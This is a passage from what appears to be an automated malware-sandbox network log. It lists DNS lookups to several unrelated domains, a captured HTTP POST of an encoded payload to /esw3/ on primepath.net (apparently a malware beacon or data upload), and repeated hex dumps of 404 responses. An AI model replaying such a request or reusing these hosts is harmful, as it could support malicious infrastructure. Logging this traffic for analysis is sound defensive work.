                Source: global trafficDNS traffic detected: DNS query: www.streaay.live
                Source: global trafficDNS traffic detected: DNS query: www.77zhibo.net
                Source: global trafficDNS traffic detected: DNS query: www.thefounder.ceo
                Source: global trafficDNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: unknownHTTP traffic detected: POST /esw3/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cache-Control: max-age=0Content-Length: 203Connection: closeContent-Type: application/x-www-form-urlencodedHost: www.primepath.netOrigin: http://www.primepath.netReferer: http://www.primepath.net/esw3/User-Agent: Mozilla/5.0 (Linux; Android 5.0; X1 Grand Build/X1Grand) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36Data Raw: 2d 6e 3d 66 52 67 6e 4e 56 4e 53 56 54 69 4d 64 58 4b 48 68 57 4e 41 70 46 70 46 34 4d 68 39 48 55 37 63 38 4c 4c 48 34 71 62 2b 58 50 43 62 49 51 33 6a 77 52 6c 77 4f 47 6f 77 71 75 50 36 79 53 4a 38 73 34 68 53 62 58 63 4a 4a 4b 65 51 67 36 73 48 43 6a 75 46 51 31 56 46 4a 48 59 79 4c 4e 56 61 47 56 56 64 67 4f 75 4c 68 53 45 63 4b 52 71 52 56 7a 50 54 33 55 57 31 35 30 61 35 67 52 65 39 4b 71 68 47 61 33 57 35 4c 71 56 77 30 37 2b 6d 65 32 70 39 48 45 30 32 6b 62 34 33 42 35 2f 32 7a 54 50 42 6c 4c 5a 50 44 6e 32 34 47 2b 47 37 56 68 33 72 59 63 4f 6b 32 70 50 49 6e 61 75 62 73 71 78 76 36 4c 63 3d Data Ascii: -n=fRgnNVNSVTiMdXKHhWNApFpF4Mh9HU7c8LLH4qb+XPCbIQ3jwRlwOGowquP6ySJ8s4hSbXcJJKeQg6sHCjuFQ1VFJHYyLNVaGVVdgOuLhSEcKRqRVzPT3UW150a5gRe9KqhGa3W5LqVw07+me2p9HE02kb43B5/2zTPBlLZPDn24G+G7Vh3rYcOk2pPInaubsqxv6Lc=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 03 Mar 2025 07:46:11 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 265Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 6f 6e 65 72 76 65 72 73 65 2e 61 70 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.loonerverse.app Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 03 Mar 2025 07:46:27 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 03 Mar 2025 07:46:30 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.2.27expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://primepath.net/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 03 Mar 2025 07:46:32 GMTserver: LiteSpeedData Raw: 31 65 35 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 73 1b b7 92 e8 67 b2 ea fc 07 68 5c 2b 71 ec 79 f3 4d 91 ca 49 1c 67 93 3d 76 9c f5 63 b7 6e 59 5e 2d 38 03 92 b0 e7 15 00 14 a9 e8 e8 07 dd bf 71 7f d9 56 03 f3 22 39 22 f5 ca b9 bb b5 76 25 e2 0c 06 e8 6e 34 1a dd 8d 57 63 7c f4 e3 db 97 1f fe cf 6f af d0 42 44 e1 59 b3 39 86 5f 14 e2 78 3e d1 d4 5f 12 9b 1f df 6b da 59 13 21 84 c6 0b 82 03 f5 28 5f 23 22 30 5a 08 91 9a e4 f7 25 bd 9c 68 2f 93 58 90 58 98 1f ae 52 a2 21 5f bd 4d 34 41 d6 c2 06 d0 a7 c8 5f 60 c6 89 98 7c fc f0 93 39 c8 c0 96 b0 62 1c 91 89 16 10 ee 33 9a 0a 9a c4 15 20 7f c3 82 c4 c8 44 6f 68 4c 23 1c a2 1f c2 64 8e 8e 71 94 9e a2 37 78 8e ff a0 31 41 3f 7f 78 f3 1a 7d 58 90 88 dc 02 fa 92 92 55 9a 30 51 81 bb a2 81 58 4c 02 72 49 7d 62 ca 17 03 d1 98 0a 8a 43 93 fb 38 24 13 d7 40 11 5e d3 68 19 e5 09 55 e8 21 8d bf a2 05 23 b3 89 06 ac e0 23 db f6 83 d8 fa c2 03 12 d2 4b 66 c5 44 d8 71 1a d9 8c 44 74 4d fd 24 fe 6b c7 72 2d c7 9e 25 b1 e0 65 aa e5 73 ae 21 46 c2 89 c6 c5 55 48 f8 82 10 a1 21 3b e3 bc a0 22 24 67 bf e1 39 41 71 22 d0 2c 59 c6 01 3a 7e 36 f0 5c f7 14 fd c6 68 44 d0 6f 58 2c c6 b6 ca d8 1c cb b6 91 fc 3c 61 c9 34 11 fc a4 68 8f 93 08 af 4d 1a e1 39 31 53 46 80 25 a3 10 b3 39 39 01 6c 8d b1 44 7f 46 a3 f9 88 f2 d6 27 4e ff 20 7c a2 e1 a5 48 34 44 3f 1b 48 a5 fc 87 4a 32 20 4d 47 d7 12 36 a6 b1 49 63 c1 68 cc a9 6f 42 c1 11 6a 3b 8e 93 ae 91 db 95 3f 37 63 5b 41 6f 36 c6 92 6f 50 df 93 20 e6 40 c8 8c 08 7f 71 a2 58 79 62 db 29 54 2a c5 62 01 1c 94 a4 8d 95 58 20 71 95 92 4c a8 be e0 4b ac 52 b5 b3 a6 fd 1c 8d 8f 3e bd fc f1 fb 0f df 7f 42 cf ed e6 8a c6 41 b2 b2 2e 56 29 89 92 2f f4 3d 11 82 c6 73 8e 26 e8 5a 9b 62 4e 3e b2 50 1b 65 8d 76 6e 9f db dc 5a 59 09 9b 9f db 92 37 fc dc f6 13 46 ce 6d 59 f8 dc 76 bb 96 63 b5 cf ed be b7 ee 7b e7 b6 66 68 64 2d b4 91 66 a5 f1 5c 33 34 7e 39 7f 18 3c 7e 39 97 d0 f8 e5 fc 95 02 c8 2f 25 c0 64 c9 7c a2 8d ae 35 3f 89 7d 2c 24 19 19 bd 23 20 77 83 41 e7 f6 2a 35 69 ec 87 cb 80 f0 73 fb 0b 97 09 b2 8c c9 48 48 30 27 56 44 41 2c bf bb 24 6c d2 b3 fa 96 a7 dd dc 9c 36 ed e7 47 e8 c3 82 72 34 a3 21 41 94 23 68 69 73 4e 62 c2 b0 20 01 f0 f1 68 b6 8c 7d e8 8d 2d 6a c4 fa f5 25 66 28 31 b8 41 4e f3 74 e4 b7 88 7e 2d d8 95 fc 26 26 d7 7c 99 42 2f fb 40 b8 e0 23 62 08 1a 11 2e 70 94 8e 5a 31 59 a1 1f b1 20 ba 75 89 c3 25 79 3b 6b e9 37 a7 9c 70 4e 93 f8 bd 48 18 9e 13 8b 13 f1 8b 20 51 2b 31 fe e5 fd db 5f 2d 0e 12 35 a7 b3 ab 96 d0 f5 1b 1f 0b 7f 01 e8 6e 6e 0a f4 69 8b 18 02 48 23 96 1f 12 cc Data Ascii: 1e5b}ksgh\+qyMIg=vcnY^-8qV
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:43 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:46 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:46:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 03 Mar 2025 07:47:38 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 03 Mar 2025 07:47:40 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 03 Mar 2025 07:47:43 GMTTransfer-Encoding: chunkedConnection: closeData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 03 Mar 2025 07:47:51 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 